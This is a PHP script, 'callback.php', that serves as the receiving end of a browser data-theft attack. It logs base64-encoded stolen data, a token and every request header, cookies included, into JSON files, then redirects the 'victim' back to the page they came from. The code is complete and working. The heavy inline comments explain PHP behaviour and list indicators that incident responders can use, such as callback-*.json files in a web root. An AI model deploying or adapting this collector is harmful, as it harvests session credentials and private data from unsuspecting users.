callback.php
<?php
/* Variables */
// Set the panic address to redirect the client to if they don't provide a valid referer address.
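$panic = "https://www.google.com/";
// The bare `$new_location;` statement that used to follow was a no-op: reading an
// unassigned variable as an expression only raises an "Undefined variable" warning.
// $new_location is first assigned in the referer check further down, so the
// declaration is dropped here.
//
// Every field except "timestamp" is copied verbatim from the incoming request:
// three base64-encoded query parameters plus the complete request header set.
// Nothing is validated before the record is written to disk below, so each stored
// file is a faithful copy of what the client's browser sent — for incident
// responders, one file per affected client. A missing query parameter yields a
// null index (warning) and base64_decode() then returns '' (with a deprecation
// notice on PHP 8.1+).
$callback = [
    "data" => base64_decode($_GET["data"]),
    "referer" => base64_decode($_GET["referer"]),
    "token" => base64_decode($_GET["token"]),
    "headers" => getallheaders(),
    // date() formats in PHP's default timezone and records no offset, so the value
    // is only interpretable together with the server's timezone setting.
    "timestamp" => date( "Y-m-d H:i:s", time() )
];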
/* Functions */
// Build a string of $length characters drawn from [A-Za-z0-9].
// Characters are picked with rand(), which is not a cryptographic generator, so the
// output should not be relied on for unpredictability. A $length of zero or less
// yields ''.
function randomString($length) {
    $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $lastIndex = strlen($alphabet) - 1;
    $result = '';
    for ($i = 0; $i < $length; $i++) {
        $result .= $alphabet[rand(0, $lastIndex)];
    }
    return $result;
}
/* Events */
// Save sniffed data.
// Each request is persisted as its own JSON file in the script's directory, named
// "callback-" + nine randomString() characters + ".json", with no validation of the
// content. For defenders, files matching that pattern in a web root are a direct
// indicator of this script, and each one documents a single affected client.
// json_encode()'s second argument is a flags bitmask: `true` coerces to 1, i.e.
// JSON_HEX_TAG (escapes < and >). No JSON_INVALID_UTF8_* / PARTIAL_OUTPUT flag is
// set, so if the base64-decoded fields contain non-UTF-8 bytes json_encode() returns
// false and an empty file is written — empty callback-*.json files are likely hits too.
try {
file_put_contents( "./callback-" . randomString(9) . ".json", json_encode($callback, true) );
// file_put_contents() reports failure via a warning and a false return, not an
// exception, so this catch never fires and a failed write goes unnoticed.
} catch (Exception $ignore) {}
// Check if valid referer is provided.
// Both patterns are unanchored: a value passes as soon as it contains "http://" or
// "https://" followed by one alphanumeric anywhere, so this is a presence test, not
// URL validation. The decoded query value is preferred over the Referer header; the
// header is looked up under the key exactly as getallheaders() returned it, and when
// no Referer header was sent the index is undefined (warning, null passed on).
if ( preg_match_all("/http[s]?:\/\/[a-z0-9]/i", $callback["referer"]) ) {
$new_location = $callback["referer"];
} else if ( preg_match_all("/http[s]?:\/\/[a-z0-9]/i", $callback["headers"]["Referer"]) ) {
$new_location = $callback["headers"]["Referer"];
} else {
$new_location = $panic;
}
// Add token to referer address.
// Loose (!=) comparison against the panic URL. When a referer was accepted, the
// decoded "token" query value becomes the URL fragment, replacing any existing one,
// so it travels to the destination page (and presumably into browser history).
if ($new_location != $panic) {
if ( preg_match_all("/#.*$/", $new_location ) ) {
$new_location = preg_replace("/#.*$/", "#" . $callback["token"], $new_location);
} else {
$new_location .= "#" . $callback["token"];
}
}
// Redirect the victim.
// The 301 is set before header(); otherwise header("Location: ...") would default the
// status to 302. If display_errors is on and any warning above was already printed,
// header() fails with "headers already sent" and no redirect happens.
http_response_code(301);
header("Location: " . $new_location);
?>